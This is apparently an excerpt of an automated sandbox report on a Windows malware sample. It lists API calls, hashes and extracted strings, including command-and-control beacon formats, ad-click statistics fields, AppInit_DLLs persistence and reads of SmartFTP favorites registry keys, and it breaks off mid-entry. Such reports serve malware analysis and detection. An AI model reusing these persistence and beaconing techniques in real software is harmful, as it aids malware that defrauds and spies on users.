                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$AttemptConnectInternet
                                                                                                                                                                                                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                                                                                                                                                                                                  • API String ID: 362191241-2593661552
                                                                                                                                                                                                  • Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                                                                                                                                                                                                  • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                                                                                                                                                                                                  • __FindPESection.LIBCMT ref: 0040D8AC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 876702719-0
                                                                                                                                                                                                  • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                  • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004088E4
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004088E9
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004089D3
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004089D8
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004089F3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                  • String ID: +@
                                                                                                                                                                                                  • API String ID: 3341692771-3835504741
                                                                                                                                                                                                  • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                  • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                                                                                                                                                                                                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                  • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                                                                                                                                                                                                  • API String ID: 3100629401-2436734164
                                                                                                                                                                                                  • Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                                                                                                                                                                                                  • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                                                                                                                                                                                                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  • _memset.LIBCMT ref: 004025DA
                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                                                                                                                                                                                                  • String ID: none
                                                                                                                                                                                                  • API String ID: 2353737338-2140143823
                                                                                                                                                                                                  • Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                                                                                                                                                                                                  • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                                                                  • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                  • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _memset.LIBCMT ref: 0040A26B
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                                                                                                                                                                                                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                                                                                                                                                                                                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                                                                                                                                                                                                  • String ID: J(@
                                                                                                                                                                                                  • API String ID: 3143865713-2848800318
                                                                                                                                                                                                  • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                                                                                                                                                                                                  • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                                                                                                                                                                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407880
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00407888
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCountCreateHandleModuleNameTickTime
                                                                                                                                                                                                  • String ID: UniqueNum
                                                                                                                                                                                                  • API String ID: 1853814767-3816303966
                                                                                                                                                                                                  • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                                                                                                                                                                                                  • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                                                                                                                                                                                                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateModuleNamePointerRead
                                                                                                                                                                                                  • String ID: UniqueNum$d$hOAd$x
                                                                                                                                                                                                  • API String ID: 1528952607-1018652783
                                                                                                                                                                                                  • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                  • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                                                                                                                                                                                                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                                                                                                                                                                                                  • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                                                                                                                                                                                                  • API String ID: 4026185228-3265104503
                                                                                                                                                                                                  • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                  • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                  • String ID: </title>$</url>$<title>$<url>
                                                                                                                                                                                                  • API String ID: 2525500382-2286408829
                                                                                                                                                                                                  • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                  • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                                                                                                                                                                                                  • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • 0, xrefs: 0040AA5B
                                                                                                                                                                                                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                                                                                                                                                                                                  • API String ID: 3713053250-1268808612
                                                                                                                                                                                                  • Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                                                                                                                                                                                                  • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00408452
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1974014688-0
                                                                                                                                                                                                  • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                  • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                                                                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                                                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                                                                                                                                                                                                  • String ID: POST
                                                                                                                                                                                                  • API String ID: 961146071-1814004025
                                                                                                                                                                                                  • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                  • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                                                                                                                                                                                                  • personal favorites, xrefs: 00405176
                                                                                                                                                                                                  • folder, xrefs: 00405184
                                                                                                                                                                                                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                                                                                                                                                                                                  Memory Dump Source
